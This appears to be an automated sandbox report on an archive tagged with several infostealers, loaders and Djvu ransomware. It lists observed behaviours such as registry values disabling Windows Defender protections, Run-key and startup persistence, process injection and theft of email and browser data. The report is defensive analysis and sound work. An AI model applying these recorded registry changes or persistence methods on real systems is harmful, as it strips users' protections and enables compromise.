Malware Analysis Report

2025-01-18 06:22

Sample ID 231017-hrx2nsbf74
Target Archive.7z
SHA256 c5d36d14ec04f6a568172a2a91959b17dc768c41dc6bc9486d975d41056ac7b0
Tags
dcrat djvu privateloader redline risepro smokeloader stealc breha build285 logsdiller cloud (tg: @logsdillabot) up3 amadey_qbo backdoor collection discovery evasion infostealer loader persistence ransomware rat spyware stealer trojan vmprotect amadey themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c5d36d14ec04f6a568172a2a91959b17dc768c41dc6bc9486d975d41056ac7b0

Threat Level: Known bad

The file Archive.7z was found to be: Known bad.

Malicious Activity Summary

dcrat djvu privateloader redline risepro smokeloader stealc breha build285 logsdiller cloud (tg: @logsdillabot) up3 amadey_qbo backdoor collection discovery evasion infostealer loader persistence ransomware rat spyware stealer trojan vmprotect amadey themida

DcRat

Amadey

Djvu Ransomware

RedLine

Detected Djvu ransomware

RedLine payload

PrivateLoader

Stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Modifies Windows Defender Real-time Protection settings

RisePro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Renames multiple (169) files with added filename extension

Finds standalone samples of Amadey based on characteristic strings

Stops running service(s)

Downloads MZ/PE file

VMProtect packed file

Loads dropped DLL

Drops startup file

Reads user/profile data of web browsers

Windows security modification

.NET Reactor proctector

Executes dropped EXE

Reads user/profile data of local email clients

Themida packer

Checks BIOS information in registry

Modifies file permissions

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops Chrome extension

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: CmdExeWriteProcessMemorySpam

outlook_office_path

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Checks processor information in registry

Suspicious behavior: MapViewOfSection

outlook_win_path

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-17 06:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-17 06:58

Reported

2023-10-17 07:28

Platform

win7-20230831-en

Max time kernel

887s

Max time network

1060s

Command Line

C:\Windows\Explorer.EXE

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6a32e694-ce15-4166-b5d5-39601b8b4741\\_Axw7GGd2Fy7GTHeEDtFtPCq.exe\" --AutoStart" C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Finds standalone samples of Amadey based on characteristic strings

amadey_qbo
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\05i4TLYHZEFYjn7jxbwobpPC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6a32e694-ce15-4166-b5d5-39601b8b4741\\_Axw7GGd2Fy7GTHeEDtFtPCq.exe\" --AutoStart" C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgmhkjfpialldbnnihoodfehhlmpplgf\1.5.6_0\manifest.json C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1076 set thread context of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 2276 set thread context of 2256 N/A C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2456 set thread context of 1708 N/A C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1596 set thread context of 1620 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1948 set thread context of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2152 set thread context of 2764 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2352 set thread context of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 set thread context of 2824 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 3364 set thread context of 3484 N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
